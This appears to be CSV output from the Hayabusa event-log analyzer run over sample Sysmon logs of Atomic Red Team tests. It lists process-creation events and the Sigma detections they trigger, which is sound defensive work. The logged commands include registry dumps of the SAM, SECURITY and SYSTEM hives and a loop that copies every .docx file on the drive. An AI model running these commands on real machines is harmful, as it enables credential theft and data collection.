Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2440 | PGUID: 
747F3D96-D87C-5D31-0000-00103F573100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"" | LID: 0x50951 | PID: 4360 | PGUID: 747F3D96-D87C-5D31-0000-001080593100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 956 | PGUID: 747F3D96-D87C-5D31-0000-0010CA5B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 3608 | PGUID: 
747F3D96-D87C-5D31-0000-00101D5E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6832 | PGUID: 747F3D96-D87C-5D31-0000-001056603100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"" | LID: 0x50951 | PID: 6436 | PGUID: 747F3D96-D87C-5D31-0000-0010A8623100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | Process: C:\Windows\System32\cmd.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5936 | PGUID: 747F3D96-D87C-5D31-0000-0010E1643100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D87C-5D31-0000-001033673100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1740 | PGUID: 747F3D96-D87C-5D31-0000-00107C693100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 644 | PGUID: 
747F3D96-D87C-5D31-0000-0010C86B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4220 | PGUID: 747F3D96-D87C-5D31-0000-0010056E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx"" | LID: 0x50951 | PID: 6620 | PGUID: 747F3D96-D87C-5D31-0000-001057703100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 
0x50951 | PID: 196 | PGUID: 747F3D96-D87D-5D31-0000-001090723100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 3172 | PGUID: 747F3D96-D87D-5D31-0000-0010E2743100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2148 | PGUID: 747F3D96-D87D-5D31-0000-00102B773100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 1472 | PGUID: 
747F3D96-D87D-5D31-0000-00107D793100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3616 | PGUID: 747F3D96-D87D-5D31-0000-0010B37B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D87D-5D31-0000-0010057E3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: 
powershell | LID: 0x50951 | PID: 324 | PGUID: 747F3D96-D87D-5D31-0000-00103B803100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 1224 | PGUID: 747F3D96-D87D-5D31-0000-00108D823100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3900 | PGUID: 747F3D96-D87D-5D31-0000-0010CA843100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" | LID: 0x50951 | PID: 3412 | PGUID: 
747F3D96-D87D-5D31-0000-00101C873100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D87D-5D31-0000-0010FA8A3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" | LID: 0x50951 | PID: 6536 | PGUID: 747F3D96-D87D-5D31-0000-00104C8D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Disc,Query Registry,,rules/sigma/process_creation/proc_creation_win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1728 | PGUID: 
747F3D96-D87D-5D31-0000-0010958F3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\Security security.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D87D-5D31-0000-0010E4913100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3904 | PGUID: 747F3D96-D883-5D31-0000-0010839B3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\System system.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-D883-5D31-0000-0010D49D3100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D885-5D31-0000-00107F1A3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SAM sam.hive | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" | LID: 0x50951 | PID: 4140 | PGUID: 747F3D96-D885-5D31-0000-0010D11C3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:41.691 
+09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D887-5D31-0000-0010D51F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D88F-5D31-0000-0010BD353200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 608 | 
PGUID: 747F3D96-D890-5D31-0000-001012383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Collect | CredAccess,Automated Collection Command Prompt,,rules/sigma/process_creation/proc_creation_win_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious DIR Execution,,rules/sigma/process_creation/proc_creation_win_susp_dir.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: findstr /e .docx | Process: C:\Windows\System32\findstr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" | LID: 0x50951 | PID: 6328 | PGUID: 747F3D96-D890-5D31-0000-0010A5383200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1568 | PGUID: 747F3D96-D890-5D31-0000-0010FA3F3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4316 | PGUID: 
